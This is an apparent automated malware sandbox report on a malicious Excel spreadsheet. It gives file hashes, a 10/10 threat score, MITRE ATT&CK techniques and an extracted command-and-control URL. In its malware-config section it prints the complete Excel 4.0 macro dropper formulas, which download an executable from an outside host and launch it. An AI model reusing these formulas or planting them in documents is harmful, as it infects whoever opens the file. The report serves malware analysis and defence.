General

  • Target

    9ec8d5bc205fded2bf9508f7194f88f4.bin

  • Size

    43KB

  • Sample

    230627-cadzkscg38

  • MD5

    1e10e7e5b61684e6c2ba1140e249e6da

  • SHA1

    8e47469ab3939d51a0d84e639dbc2fb2d090bbab

  • SHA256

    af1f2422d6f244a032e6cf188215ffe4cdbc980597deeee8f417ef6f549da2c8

  • SHA512

    44394e9769d8b0b997d0b94be8ba80c29ab175d4228836636d400937f4ce6fa84e6ed99cfcca9d7ec1e78f1c2f36ff9df71e714fc82514f5eceeaa1dc737dab5

  • SSDEEP

    768:66nK92tehkZr3ZNHpgn2X9Xmv/gePzAUhD/q4QNrTgC0ZXzLI8Y5W:bK9z4XJgn2X5mvxbDArTg5XHI8CW

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0)
    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0)
    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0)
    =HALT()

Extracted

Language
xlm4.0

Source
xlm40.dropper

URLs

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Targets

    • Target

      eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2.xlsx

    • Size

      94KB

    • MD5

      9ec8d5bc205fded2bf9508f7194f88f4

    • SHA1

      7009deb529f2d4355727f73bf586f02415c2f492

    • SHA256

      eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2

    • SHA512

      37bf6ca2d80d6124f5dae24ce2b6c6944dfde623593111d31f964ce3fc452ff1cc7e4ceb9c294b78b28c4f7a4c994aa5ef9eed8db9863bf7268fd2c5fbfa778c

    • SSDEEP

      1536:YveZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA0VSNcd52CibTXVNpity5pgKejDzGYK:Y2Z+RwPONXoRjDhIcp0fDlaGGx+cL26G

    Score
    10/10

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks